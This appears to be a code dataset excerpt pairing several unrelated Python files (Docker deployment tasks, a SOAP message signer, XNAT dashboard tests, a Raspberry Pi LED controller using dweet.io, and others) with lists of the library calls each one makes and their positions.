phylo_prots = ce.prots_from_scratch(phylo_names,path2alg='TestSet/eggNOG_aligns/phylogenes/')
phylo2 = ce.PhyloSet(phylo_prots)
phylo2.set_indexer(thresh=7)
for pt in phylo2.prots: # temporary fix for duplicated locus ids in the same msa
pt.msa = pt.msa[~pt.msa.index.duplicated(keep='first')]
phylo2.set_sim_mat()
protsmats,pairmats,pairrandmats,sca_score,sca_score2 = ce.sca(ps,phylo2,delta=0.0001)
for pt,sca in it.izip(ps.prots,protsmats): pt.sca_mat = sca
for pair,sca_cat in it.izip(ps.pairs,pairmats): pair.sca_mat = sca_cat
np.save('GettingStartedSCACalcs.npy',ps)
print(sca_score2)
| [
"coevo2.ProtSet",
"itertools.izip",
"coevo2.PhyloSet",
"coevo2.sca",
"numpy.save",
"coevo2.prots_from_scratch"
] | [((253, 299), 'coevo2.prots_from_scratch', 'ce.prots_from_scratch', (['names'], {'path2alg': 'algPath'}), '(names, path2alg=algPath)\n', (274, 299), True, 'import coevo2 as ce\n'), ((304, 328), 'coevo2.ProtSet', 'ce.ProtSet', (['prots', 'names'], {}), '(prots, names)\n', (314, 328), True, 'import coevo2 as ce\n'), ((425, 510), 'coevo2.prots_from_scratch', 'ce.prots_from_scratch', (['phylo_names'], {'path2alg': '"""TestSet/eggNOG_aligns/phylogenes/"""'}), "(phylo_names, path2alg='TestSet/eggNOG_aligns/phylogenes/'\n )\n", (446, 510), True, 'import coevo2 as ce\n'), ((515, 539), 'coevo2.PhyloSet', 'ce.PhyloSet', (['phylo_prots'], {}), '(phylo_prots)\n', (526, 539), True, 'import coevo2 as ce\n'), ((788, 820), 'coevo2.sca', 'ce.sca', (['ps', 'phylo2'], {'delta': '(0.0001)'}), '(ps, phylo2, delta=0.0001)\n', (794, 820), True, 'import coevo2 as ce\n'), ((834, 862), 'itertools.izip', 'it.izip', (['ps.prots', 'protsmats'], {}), '(ps.prots, protsmats)\n', (841, 862), True, 'import itertools as it\n'), ((900, 927), 'itertools.izip', 'it.izip', (['ps.pairs', 'pairmats'], {}), '(ps.pairs, pairmats)\n', (907, 927), True, 'import itertools as it\n'), ((951, 992), 'numpy.save', 'np.save', (['"""GettingStartedSCACalcs.npy"""', 'ps'], {}), "('GettingStartedSCACalcs.npy', ps)\n", (958, 992), True, 'import numpy as np\n')] |
import os
import re
import requests
from invoke import task
def _get_aws_token(c):
token = os.getenv("AWS_TOKEN")
if not token:
token = c.run("aws ecr get-authorization-token --output text "
"--query 'authorizationData[].authorizationToken'", hide=True).stdout.strip()
return token
def _get_gcloud_token(c):
token = os.getenv("GCLOUD_TOKEN")
if not token:
token = c.run("gcloud auth print-access-token", hide=True).stdout.strip()
return token
def _version_to_int(version):
"""Converts a version number into an integer number, so it can be sorted
>>> _version_to_int("0.1.1")
1001
>>> _version_to_int("1.2.3")
1002003
>>> _version_to_int("2001")
2001
>>> _version_to_int("latest")
0
"""
if version == "latest":
return 0
components = version.split(".")
ret = 0
for i, comp in enumerate(components):
ret += int(comp) * (1000 ** (len(components) - (i + 1)))
return ret
def _registry_type(registry):
if "amazonaws" in registry:
return "aws"
elif "gcr.io" in registry:
return "googlecloud"
elif "icr.io" in registry:
return "ibmcloud"
elif registry == "":
return "dockerhub"
else:
return "unknown"
def _join(registry, image):
if not registry:
return image
return "{}/{}".format(registry, image)
def _auth_headers(c, registry):
if _registry_type(registry) == "aws":
token = _get_aws_token(c)
return dict(headers={'Authorization': 'Basic {}'.format(token)})
elif _registry_type(registry) == "googlecloud":
token = _get_gcloud_token(c)
return dict(auth=("oauth2accesstoken", token))
else:
return {}
def _get_last_version_from_local_docker(c, registry, image):
registry_image = _join(registry, image)
output = c.run(f"docker image ls {registry_image}", hide="out")
# Black magic explanation: skips first line (header), 2nd field is version
tags = [re.split(" +", lin)[1] for lin in output.stdout.splitlines()[1:]]
return sorted(tags, key=_version_to_int)[-1]
def _get_last_version(c, registry, image):
if _registry_type(registry) in ("ibmcloud", "dockerhub"):
# fallback, don't know how to get tabs from ibmcloud registry
return _get_last_version_from_local_docker(c, registry, image)
url = 'https://{}/v2/{}/tags/list'.format(registry, image)
r = requests.get(url, **_auth_headers(c, registry))
r.raise_for_status()
tags = r.json()['tags']
if len(tags) == 100:
raise RuntimeError(
"Error, the response has 100 tags, we hit the limit and paging not supported, "
"you should remove some tags in ECR console"
)
return sorted(tags, key=_version_to_int)[-1]
def _get_next_version(c, registry, image):
registry, image = _default_registry_image(c, registry, image)
version = _get_last_version(c, registry, image)
parts = version.split('.')
parts[-1] = str(int(parts[-1]) + 1)
return '.'.join(parts)
def _default_registry_image(c, registry, image):
if not registry:
registry = c.config.registry
if not image:
image = c.config.image
return registry, image
@task
def last_version(c, registry=None, image=None):
registry, image = _default_registry_image(c, registry, image)
print(_get_last_version(c, registry, image))
@task
def next_version(c, registry=None, image=None):
registry, image = _default_registry_image(c, registry, image)
print(_get_next_version(c, registry, image))
def docker_exec(c, command, container=None, pty=True, envs={}, workdir=None):
container = container or c.config.container
run_command = "docker exec "
if pty:
run_command += "-it "
if workdir:
run_command += f"-w {workdir}"
for env_var, env_value in envs.items():
run_command += f"--env {env_var}={env_value} "
for k, env_value in os.environ.items():
if k.startswith("DOCKEREXEC_"):
env_var = k.split('_', 1)[1]
run_command += f"--env {env_var}={env_value} "
c.run("{} {} {}".format(run_command, container, command), pty=pty)
@task
def docker_put(c, source, target, container=None):
container = container or c.config.container
c.run(f"docker cp {source} {container}:{target}")
@task
def docker_get(c, source, target, container=None):
container = container or c.config.container
c.run(f"docker cp {container}:{source} {target}")
def _compose_file():
return os.getenv("COMPOSE_FILE", "docker-compose.yml")
@task
def start_dev(c, compose_files="docker-compose.override.dev.yml,docker-compose.override.local-dev.yml",
detach=True):
extra_param = ""
for compose_file in compose_files.split(","):
if os.path.exists(compose_file):
extra_param += f"-f {compose_file} "
detach = "-d" if detach else ""
c.run(f"docker-compose -f {_compose_file()} {extra_param} up --build {detach}")
@task
def start(c, detach=True):
detach = "-d" if detach else ""
c.run(f"docker-compose -f {_compose_file()} up --build {detach}")
@task
def stop(c):
c.run(f"docker-compose down -f {_compose_file()}")
@task
def shell(c):
shell = c.config.get("container_shell", "sh")
docker_exec(c, shell)
@task
def pyshell(c):
pyshell = c.config.get("container_pyshell", "ipython")
docker_exec(c, pyshell)
@task
def build(c, registry=None, image=None, version=None):
registry, image = _default_registry_image(c, registry, image)
registry_image = _join(registry, image)
version = version or _get_next_version(c, registry, image)
c.run("docker build -t {}:{} .".format(registry_image, version))
@task
def push_image(c, registry=None, image=None, version=None):
registry, image = _default_registry_image(c, registry, image)
if not version:
if _registry_type(registry) in ("ibmcloud", "dockerhub"):
version = _get_last_version_from_local_docker(c, registry, image)
else:
version = _get_next_version(c, registry, image)
if _registry_type(registry) == "aws":
docker_login_cmd = c.run("aws ecr get-login --no-include-email", hide=True).stdout
c.run(docker_login_cmd)
registry_image = _join(registry, image)
c.run("docker push {}:{}".format(registry_image, version))
| [
"os.environ.items",
"os.path.exists",
"os.getenv",
"re.split"
] | [((97, 119), 'os.getenv', 'os.getenv', (['"""AWS_TOKEN"""'], {}), "('AWS_TOKEN')\n", (106, 119), False, 'import os\n'), ((366, 391), 'os.getenv', 'os.getenv', (['"""GCLOUD_TOKEN"""'], {}), "('GCLOUD_TOKEN')\n", (375, 391), False, 'import os\n'), ((4004, 4022), 'os.environ.items', 'os.environ.items', ([], {}), '()\n', (4020, 4022), False, 'import os\n'), ((4592, 4639), 'os.getenv', 'os.getenv', (['"""COMPOSE_FILE"""', '"""docker-compose.yml"""'], {}), "('COMPOSE_FILE', 'docker-compose.yml')\n", (4601, 4639), False, 'import os\n'), ((4862, 4890), 'os.path.exists', 'os.path.exists', (['compose_file'], {}), '(compose_file)\n', (4876, 4890), False, 'import os\n'), ((2035, 2054), 're.split', 're.split', (['""" +"""', 'lin'], {}), "(' +', lin)\n", (2043, 2054), False, 'import re\n')] |
#!/usr/bin/env python
from __future__ import with_statement
from suds.plugin import MessagePlugin
from lxml import etree
from suds.bindings.binding import envns
from suds.wsse import wsuns, dsns, wssens
from libxml2_wrapper import LibXML2ParsedDocument
from xmlsec_wrapper import XmlSecSignatureContext, init_xmlsec, deinit_xmlsec
from OpenSSL import crypto
from uuid import uuid4
import xmlsec
def lxml_ns(suds_ns):
return dict((suds_ns,))
def lxml_nss(suds_ns):
d = {}
for ns,uri in suds_ns:
d[ns] = uri
return d
def ns_id(tagname, suds_ns):
return '{{{0}}}{1}'.format(suds_ns[1], tagname)
# Constants missing in xmlsec.strings
AttrEncodingType = 'EncodingType'
AttrValueType = 'ValueType'
NodeBinarySecurityToken = 'BinarySecurityToken'
NodeSecurity = 'Security'
NodeSecurityTokenReference = 'SecurityTokenReference'
LXML_ENV = lxml_ns(envns)
BODY_XPATH = etree.XPath('/SOAP-ENV:Envelope/SOAP-ENV:Body', namespaces=LXML_ENV)
HEADER_XPATH = etree.XPath('/SOAP-ENV:Envelope/SOAP-ENV:Header', namespaces=LXML_ENV)
SECURITY_XPATH = etree.XPath('/SOAP-ENV:Envelope/SOAP-ENV:Header/wsse:Security', namespaces=lxml_nss([envns, wssens]))
TIMESTAMP_XPATH = etree.XPath('/SOAP-ENV:Envelope/SOAP-ENV:Header/wsse:Security/wsu:Timestamp', namespaces=lxml_nss([envns, wssens, wsuns]))
B64ENC = 'http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary'
X509PROFILE = 'http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3'
CERTREF = 'x509cert00'
BEGINCERT = "-----BEGIN CERTIFICATE-----"
ENDCERT = "-----END CERTIFICATE-----"
NSMAP = dict((dsns, wssens, wsuns))
WSU_ID = ns_id(xmlsec.AttrId, wsuns)
DS_DIGEST_VALUE = ns_id(xmlsec.NodeDigestValue, dsns)
DS_REFERENCE = ns_id(xmlsec.NodeReference, dsns)
DS_TRANSFORMS = ns_id(xmlsec.NodeTransforms, dsns)
WSSE_BST = ns_id(NodeBinarySecurityToken, wssens)
DS_SIGNATURE = ns_id(xmlsec.NodeSignature, dsns)
class SignerPlugin(MessagePlugin):
def __init__(self,
keyfile,
items_to_sign=None,
keytype=None,
pwd=None, pwdCallback=None, pwdCallbackCtx=None,
transform_algorithm=None,
digestmethod_algorithm=None,
transform_count=None):
init_xmlsec()
self.keyfile = keyfile
self.pwd = pwd
self.pwdCallback = pwdCallback
self.pwdCallbackCtx = pwdCallbackCtx
self.load_keyfile()
self.keytype = self.handle_keytype(keytype)
self.items_to_sign = items_to_sign or [BODY_XPATH, TIMESTAMP_XPATH]
self.transform_algorithm = transform_algorithm or xmlsec.HrefExcC14N
self.digestmethod_algorithm = digestmethod_algorithm or xmlsec.HrefSha1
self.transform_count = transform_count or 1
def load_keyfile(self):
cert = file(self.keyfile, 'rb').read()
self.cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert)
self.privatekey = crypto.load_privatekey(crypto.FILETYPE_PEM, cert)
def handle_keytype(self, keytype):
if keytype is None:
return self.detect_keytype()
elif any(isinstance(keytype, t) for t in (str, unicode)):
return keytype
else:
raise ValueError('keytype must be a string or None')
def detect_keytype(self):
algo = self.privatekey.type()
if algo == crypto.TYPE_DSA:
return xmlsec.HrefDsaSha1
if algo == crypto.TYPE_RSA:
return xmlsec.HrefRsaSha1
raise ValueError('unknown keytype')
def marshalled(self, context):
# !!! Axis needs the same namespace as Header and Envelope
context.envelope[1].prefix = context.envelope.prefix
pass
def sending(self, context):
"""
sending plugin method: add security headers and sign msg
"""
env = etree.fromstring(context.envelope)
queue = SignQueue(self.transform_algorithm, self.digestmethod_algorithm, self.transform_count)
for item_to_sign in self.items_to_sign:
if isinstance(item_to_sign, tuple):
(item_path, item_id) = item_to_sign
else:
(item_path, item_id) = (item_to_sign, None)
for item_elem in item_path(env):
queue.push_and_mark(item_elem, item_id)
security = ensure_security_header(env, queue)
btkn = etree.SubElement(security, WSSE_BST, {
AttrEncodingType: B64ENC,
AttrValueType: X509PROFILE,
WSU_ID: CERTREF,
}, NSMAP)
crt = crypto.dump_certificate(crypto.FILETYPE_PEM, self.cert)
crt = crt.replace('\n', '').replace(BEGINCERT, '').replace(ENDCERT, '')
btkn.text = crt
self.insert_signature_template(security, queue)
context.envelope = self.get_signature(etree.tostring(env))
def insert_signature_template(self, security, queue):
signature = etree.SubElement(security, DS_SIGNATURE)
self.append_signed_info(signature, queue)
etree.SubElement(signature, ns_id(xmlsec.NodeSignatureValue, dsns))
self.append_key_info(signature)
def append_signed_info(self, signature, queue):
signed_info = etree.SubElement(signature, ns_id(xmlsec.NodeSignedInfo, dsns))
set_algorithm(signed_info, xmlsec.NodeCanonicalizationMethod, self.transform_algorithm)
set_algorithm(signed_info, xmlsec.NodeSignatureMethod, self.keytype)
queue.insert_references(signed_info)
def append_key_info(self, signature):
key_info = etree.SubElement(signature, ns_id(xmlsec.NodeKeyInfo, dsns))
sec_token_ref = etree.SubElement(key_info,
ns_id(NodeSecurityTokenReference, wssens))
etree.SubElement(sec_token_ref, ns_id(xmlsec.NodeReference, wssens), {
xmlsec.AttrURI: '#%s' % CERTREF,
AttrValueType: X509PROFILE,
})
x509_data = etree.SubElement(sec_token_ref, ns_id(xmlsec.NodeX509Data, dsns))
x509_issuer_serial = etree.SubElement(x509_data,
ns_id(xmlsec.NodeX509IssuerSerial, dsns))
x509_issuer_name = etree.SubElement(x509_issuer_serial,
ns_id(xmlsec.NodeX509IssuerName, dsns))
x509_issuer_name.text = ', '.join(
'='.join(c) for c in self.cert.get_issuer().get_components())
x509_serial_number = etree.SubElement(x509_issuer_serial,
ns_id(xmlsec.NodeX509SerialNumber, dsns))
x509_serial_number.text = str(self.cert.get_serial_number())
def get_signature(self, envelope):
with LibXML2ParsedDocument(envelope) as doc:
root = doc.getRootElement()
xmlsec.addIDs(doc, root, [xmlsec.AttrId])
signNode = xmlsec.findNode(root, xmlsec.NodeSignature, xmlsec.DSigNs)
with XmlSecSignatureContext(self) as dsig_ctx:
if dsig_ctx.sign(signNode) < 0:
raise RuntimeError('signature failed')
return doc.serialize()
def __del__(self):
deinit_xmlsec()
class SignQueue(object):
def __init__(self, transform_algorithm, digestmethod_algorithm, transform_count):
self.queue = []
self.transform_algorithm = transform_algorithm
self.digestmethod_algorithm = digestmethod_algorithm
self.transform_count = transform_count
def push_and_mark(self, element, unique_id=None):
unique_id = unique_id or get_unique_id()
element.set(WSU_ID, unique_id)
self.queue.append(unique_id)
def insert_references(self, signed_info):
for element_id in self.queue:
# Create the reference element
reference = etree.SubElement(signed_info, DS_REFERENCE,
{xmlsec.AttrURI: '#{0}'.format(element_id)})
# Add as many transforms as specified
transforms = etree.SubElement(reference, DS_TRANSFORMS)
for __ in range(0, self.transform_count):
# Add the transforms element
set_algorithm(transforms, xmlsec.NodeTransform, self.transform_algorithm)
# Set the digest algorithm
set_algorithm(reference, xmlsec.NodeDigestMethod, self.digestmethod_algorithm)
# Add the digest to the reference
etree.SubElement(reference, DS_DIGEST_VALUE)
def get_unique_id():
return 'id-{0}'.format(uuid4())
def set_algorithm(parent, name, value):
etree.SubElement(parent, ns_id(name, dsns), {xmlsec.AttrAlgorithm: value})
def ensure_security_header(env, queue):
(header,) = HEADER_XPATH(env)
security = SECURITY_XPATH(header)
if security:
return security[0]
else:
d = {}
#!!! With Axis 1.x this does not work
#d[ns_id('mustUnderstand', envns)] = '1'
security = etree.SubElement(header, ns_id(NodeSecurity, wssens), d, NSMAP)
return security
| [
"xmlsec.addIDs",
"lxml.etree.XPath",
"OpenSSL.crypto.dump_certificate",
"lxml.etree.SubElement",
"xmlsec_wrapper.XmlSecSignatureContext",
"libxml2_wrapper.LibXML2ParsedDocument",
"OpenSSL.crypto.load_privatekey",
"xmlsec_wrapper.deinit_xmlsec",
"uuid.uuid4",
"lxml.etree.fromstring",
"xmlsec_wrap... | [((897, 965), 'lxml.etree.XPath', 'etree.XPath', (['"""/SOAP-ENV:Envelope/SOAP-ENV:Body"""'], {'namespaces': 'LXML_ENV'}), "('/SOAP-ENV:Envelope/SOAP-ENV:Body', namespaces=LXML_ENV)\n", (908, 965), False, 'from lxml import etree\n'), ((981, 1051), 'lxml.etree.XPath', 'etree.XPath', (['"""/SOAP-ENV:Envelope/SOAP-ENV:Header"""'], {'namespaces': 'LXML_ENV'}), "('/SOAP-ENV:Envelope/SOAP-ENV:Header', namespaces=LXML_ENV)\n", (992, 1051), False, 'from lxml import etree\n'), ((2307, 2320), 'xmlsec_wrapper.init_xmlsec', 'init_xmlsec', ([], {}), '()\n', (2318, 2320), False, 'from xmlsec_wrapper import XmlSecSignatureContext, init_xmlsec, deinit_xmlsec\n'), ((2920, 2970), 'OpenSSL.crypto.load_certificate', 'crypto.load_certificate', (['crypto.FILETYPE_PEM', 'cert'], {}), '(crypto.FILETYPE_PEM, cert)\n', (2943, 2970), False, 'from OpenSSL import crypto\n'), ((2997, 3046), 'OpenSSL.crypto.load_privatekey', 'crypto.load_privatekey', (['crypto.FILETYPE_PEM', 'cert'], {}), '(crypto.FILETYPE_PEM, cert)\n', (3019, 3046), False, 'from OpenSSL import crypto\n'), ((3902, 3936), 'lxml.etree.fromstring', 'etree.fromstring', (['context.envelope'], {}), '(context.envelope)\n', (3918, 3936), False, 'from lxml import etree\n'), ((4467, 4587), 'lxml.etree.SubElement', 'etree.SubElement', (['security', 'WSSE_BST', '{AttrEncodingType: B64ENC, AttrValueType: X509PROFILE, WSU_ID: CERTREF}', 'NSMAP'], {}), '(security, WSSE_BST, {AttrEncodingType: B64ENC,\n AttrValueType: X509PROFILE, WSU_ID: CERTREF}, NSMAP)\n', (4483, 4587), False, 'from lxml import etree\n'), ((4661, 4716), 'OpenSSL.crypto.dump_certificate', 'crypto.dump_certificate', (['crypto.FILETYPE_PEM', 'self.cert'], {}), '(crypto.FILETYPE_PEM, self.cert)\n', (4684, 4716), False, 'from OpenSSL import crypto\n'), ((5023, 5063), 'lxml.etree.SubElement', 'etree.SubElement', (['security', 'DS_SIGNATURE'], {}), '(security, DS_SIGNATURE)\n', (5039, 5063), False, 'from lxml import etree\n'), ((7136, 7151), 'xmlsec_wrapper.deinit_xmlsec', 'deinit_xmlsec', ([], {}), '()\n', (7149, 7151), False, 'from xmlsec_wrapper import XmlSecSignatureContext, init_xmlsec, deinit_xmlsec\n'), ((8484, 8491), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (8489, 8491), False, 'from uuid import uuid4\n'), ((4923, 4942), 'lxml.etree.tostring', 'etree.tostring', (['env'], {}), '(env)\n', (4937, 4942), False, 'from lxml import etree\n'), ((6683, 6714), 'libxml2_wrapper.LibXML2ParsedDocument', 'LibXML2ParsedDocument', (['envelope'], {}), '(envelope)\n', (6704, 6714), False, 'from libxml2_wrapper import LibXML2ParsedDocument\n'), ((6775, 6816), 'xmlsec.addIDs', 'xmlsec.addIDs', (['doc', 'root', '[xmlsec.AttrId]'], {}), '(doc, root, [xmlsec.AttrId])\n', (6788, 6816), False, 'import xmlsec\n'), ((6840, 6898), 'xmlsec.findNode', 'xmlsec.findNode', (['root', 'xmlsec.NodeSignature', 'xmlsec.DSigNs'], {}), '(root, xmlsec.NodeSignature, xmlsec.DSigNs)\n', (6855, 6898), False, 'import xmlsec\n'), ((7969, 8011), 'lxml.etree.SubElement', 'etree.SubElement', (['reference', 'DS_TRANSFORMS'], {}), '(reference, DS_TRANSFORMS)\n', (7985, 8011), False, 'from lxml import etree\n'), ((8389, 8433), 'lxml.etree.SubElement', 'etree.SubElement', (['reference', 'DS_DIGEST_VALUE'], {}), '(reference, DS_DIGEST_VALUE)\n', (8405, 8433), False, 'from lxml import etree\n'), ((6916, 6944), 'xmlsec_wrapper.XmlSecSignatureContext', 'XmlSecSignatureContext', (['self'], {}), '(self)\n', (6938, 6944), False, 'from xmlsec_wrapper import XmlSecSignatureContext, init_xmlsec, deinit_xmlsec\n')] |
#!/usr/bin/env python3
import re
inputFile = open("5.in",'r')
inputContents = inputFile.readlines()
def isNice(_str):
v = [ord(c) for c in _str if c in "aeiou"]
repeated = re.search(r'([a-z])\1{1,}', _str)
forbidden = re.search(r'(ab|cd|pq|xy)', _str)
return (len(v) >= 3) and (repeated is not None) and (forbidden is None)
niceCount = 0
for shengzi in inputContents:
niceCount += isNice(shengzi.strip())
print(niceCount)
| [
"re.search"
] | [((182, 215), 're.search', 're.search', (['"""([a-z])\\\\1{1,}"""', '_str'], {}), "('([a-z])\\\\1{1,}', _str)\n", (191, 215), False, 'import re\n'), ((232, 264), 're.search', 're.search', (['"""(ab|cd|pq|xy)"""', '_str'], {}), "('(ab|cd|pq|xy)', _str)\n", (241, 264), False, 'import re\n')] |
from xnat_dashboards.data_cleaning import graph_generator
from xnat_dashboards import config
config.DASHBOARD_CONFIG_PATH = 'xnat_dashboards/config/dashboard_config.json'
config.PICKLE_PATH = 'xnat_dashboards/config/general.pickle'
def create_mocker(
mocker, username, data, role, graph_visibility, return_get_project_list,
project_visible=None):
mocker.patch(
'xnat_dashboards.data_cleaning.data_filter.DataFilter.__init__',
return_value=None)
mocker.patch(
'xnat_dashboards.data_cleaning.data_filter.DataFilter.'
'get_project_list',
return_value=return_get_project_list)
mocker.patch(
'xnat_dashboards.data_cleaning.data_filter.DataFilter.reorder_graphs',
return_value=data['info'])
graph_object = graph_generator.GraphGenerator(
username, role, data, {role: ['p1', 'y']})
return graph_object
def test_graph_preprocessor(mocker):
data = {
'info': {
"Age Range": {"x1": "y1", "x2": "y2"},
"Gender": {"x1": "y1", "x2": "y2"},
"Handedness": {"x1": "y1", "x2": "y2"},
"Experiments/Project": {"x1": "y1", "x2": "y2"}, "Stats": {}
},
'resources': {},
'longitudinal_data': {}
}
graph_object = create_mocker(
mocker, 'testUser', data, 'admin', ['*'],
{'project_list': ['p1', 'p2'], 'project_list_ow_co_me': ['p3', 'p4']})
assert isinstance(graph_object.add_graph_fields(data['info']), dict)
graph_object = create_mocker(
mocker, 'testUser', data, 'admin', ["*"],
{'project_list': [], 'project_list_ow_co_me': []})
assert isinstance(graph_object.add_graph_fields(data['info']), dict)
graph_object = create_mocker(
mocker, 'testUser', data, 'admin', ["*"],
{'project_list': [], 'project_list_ow_co_me': []})
assert graph_object.add_graph_fields([]) == []
def test_graph_generator(mocker):
data = {
'info': {
"Age Range": {"x1": "y1", "x2": "y2"},
"Gender": {"x1": "y1", "x2": "y2"},
"Handedness": {"x1": "y1", "x2": "y2"},
"Stats": {}},
"Experiments/Project": {"x1": "y1", "x2": "y2"},
"resources": {},
'longitudinal_data': {}}
graph_object = create_mocker(
mocker, 'testUser', data, 'admin', ["*"],
{'project_list': ['p1', 'p2'], 'project_list_ow_co_me': ['p3', 'p4']})
assert isinstance(graph_object.get_overview(), list)
assert isinstance(graph_object.get_overview()[0], list)
assert isinstance(graph_object.get_overview()[1], dict)
def test_project_list_generator(mocker):
data = {
"info": {
"Age Range": {"x1": "y1", "x2": "y2"},
"Gender": {"x1": "y1", "x2": "y2"},
"Handedness": {"x1": "y1", "x2": "y2"},
"Stats": {}},
"Experiments/Project": {"x1": "y1", "x2": "y2"},
"resources": {},
'longitudinal_data': {}}
graph_object = create_mocker(
mocker, 'testUser', data, 'admin', ['p1'],
{'project_list': ['p1', 'p2'], 'project_list_ow_co_me': ['p3', 'p4']})
project_list = graph_object.get_project_list()
assert isinstance(project_list, list)
assert isinstance(project_list[0], list)
assert isinstance(project_list[1], list)
graph_object = create_mocker(
mocker, 'testUser', data, 'admin', ["*"],
{'project_list': [], 'project_list_ow_co_me': []})
assert graph_object.get_project_list() == [[[]], [[]]]
graph_object = create_mocker(
mocker, 'testUser', data, 'admin', ["*"],
{'project_list': 1, 'project_list_ow_co_me': 1})
assert graph_object.get_project_list() == 1
def test_graph_generator_longitudinal(mocker):
gp = {
"Projects": {}, "Subjects": {}, "Experiments": {},
"Scans": {}, "Resources": {}}
data = {
"info": {
"Age Range": {"x1": "y1", "x2": "y2"},
"Gender": {"x1": "y1", "x2": "y2"},
"Handedness": {"x1": "y1", "x2": "y2"},
"Stats": {}},
"Experiments/Project": {"x1": "y1", "x2": "y2"},
"resources": {},
'longitudinal_data': gp}
graph_object = create_mocker(
mocker, 'testUser', data, 'admin', ['p1'],
{'project_list': ['p1', 'p2'], 'project_list_ow_co_me': ['p3', 'p4']})
ld = graph_object.get_longitudinal_graphs()
assert isinstance(ld, list)
| [
"xnat_dashboards.data_cleaning.graph_generator.GraphGenerator"
] | [((790, 863), 'xnat_dashboards.data_cleaning.graph_generator.GraphGenerator', 'graph_generator.GraphGenerator', (['username', 'role', 'data', "{role: ['p1', 'y']}"], {}), "(username, role, data, {role: ['p1', 'y']})\n", (820, 863), False, 'from xnat_dashboards.data_cleaning import graph_generator\n')] |
import pigpio
import signal
import requests
import logging
import json
import os
import sys
import threading
from time import sleep
from uuid import uuid1
# Global variables
BUTTON_GPIO = 23
LED_GPIO = 21
is_blinking = False
pi = pigpio.pi()
dweetFile = 'dweet_name.txt'
dweetURL = 'https://dweet.io'
# States
stateON = "ON"
stateOFF = "OFF"
stateBlink = "BLINK"
state = stateON
# Logging initialization
logging.basicConfig(level=logging.WARNING) # Logging global configuration
logger = logging.getLogger('main') # Logger for this module
logger.setLevel(logging.INFO) # Logging configuration for this class
# next state function
def nextState():
global state
if state == stateON:
state = stateOFF
logger.info('button pressed state is changing to ' + state)
elif state == stateOFF:
state = stateBlink
logger.info('button pressed state is changing to ' + state)
elif state == stateBlink:
state = stateON
logger.info('button pressed state is changing to ' + state)
# Create or read dweet ID
def dweetID():
if os.path.exists(dweetFile):
with open(dweetFile,'r') as f:
ID = f.read()
logger.debug('dweet ID '+ ID)
return ID.strip() #The strip function is used to remove spaces
else:
ID = str(uuid1())[:8]
logger.debug('dweet ID ' + ID)
with open(dweetFile,'w') as f:
f.write(ID)
return ID
# Sending dweet
def sendDweet(ID, stateJson):
URL = dweetURL + '/dweet/for/' + ID
logger.info('dweet url = ' + URL + 'json state = %s', stateJson)
req = requests.get(URL, params=stateJson)
if req.status_code == 200:
logger.info('dweet request result = %s', req.json())
return req.json()
else:
logger.error('dweet request failure : %s', req.status_code)
return {}
# receving dweet
def getLastDweet():
URL = dweetURL + '/get/latest/dweet/for/' + dweetID()
logger.debug('last dweet url = ' + URL)
req = requests.get(URL)
if req.status_code == 200:
dweetJson = req.json()
logger.debug('Last dweet json = %s', dweetJson)
dweetState = None
if dweetJson['this'] == 'succeeded':
dweetState = dweetJson['with'][0]['content']
return dweetState
else:
logger.error('Last dweet error %s', req.status_code)
return None
# Setting the initialization
def init():
#Button initializtion
pi.set_mode(BUTTON_GPIO,pigpio.INPUT)
pi.set_pull_up_down(BUTTON_GPIO,pigpio.PUD_UP)
pi.set_glitch_filter(BUTTON_GPIO, 100000) # 100000 ms = 0.1 secs
pi.callback(BUTTON_GPIO, pigpio.FALLING_EDGE, pressed)
#LED initialization
pi.set_mode(LED_GPIO, pigpio.OUTPUT)
pi.write(LED_GPIO, 1)
#capture CTRL + C
signal.signal(signal.SIGINT, signal_handler)
# Button handler
def pressed(gpio_pin, level, tick):
nextState()
logger.debug("Button pressed: state is " + state)
sendDweet(dweetID(), {'state': state})
# Processing dweet
def processDweet( dweet):
global state
global is_blinking
if not 'state' in dweet:
return None
dweetState = dweet['state']
if dweetState == state:
return None # State not changed
is_blinking = False
if dweetState == stateON:
pi.write(LED_GPIO, 1)
state = stateON
elif dweetState == stateBlink:
blink()
state = stateBlink
else: # Turn the led off in any other case
state = stateOFF
pi.write(LED_GPIO, 0)
logger.info('dweet state after receving dweet = ' + dweetState)
def print_instructions():
print("LED Control URLs - Try them in your web browser:")
print(" On : " + dweetURL + "/dweet/for/" + dweetID() + "?state=ON")
print(" Off : " + dweetURL + "/dweet/for/" + dweetID() + "?state=OFF")
print(" Blink : " + dweetURL + "/dweet/for/" + dweetID() + "?state=BLINK\n")
def signal_handler(sig, frame):
print('You pressed Control+C')
pi.write(LED_GPIO, 0)
sys.exit(0)
def blink():
global is_blinking
is_blinking = True
def do_blink():
while is_blinking:
pi.write(LED_GPIO, 1)
sleep(1)
pi.write(LED_GPIO, 0)
sleep(1)
# daemon=True prevents our thread below from preventing the main thread
# (essentially the code in if __name__ == '__main__') from exiting naturally
# when it reaches it's end. If you try daemon=False you will discover that the
# program never quits back to the Terminal and appears to hang after the LED turns off.
thread = threading.Thread(name='LED on GPIO ' + str(LED_GPIO), target=do_blink, daemon=True)
thread.start()
# Main entry point
if __name__ == '__main__':
init()
print_instructions()
print('Waiting for dweets. Press Control+C to exit.')
while True:
dweetState = getLastDweet()
if dweetState is not None:
processDweet(dweetState)
sleep(2)
| [
"logging.basicConfig",
"os.path.exists",
"logging.getLogger",
"signal.signal",
"requests.get",
"time.sleep",
"uuid.uuid1",
"pigpio.pi",
"sys.exit"
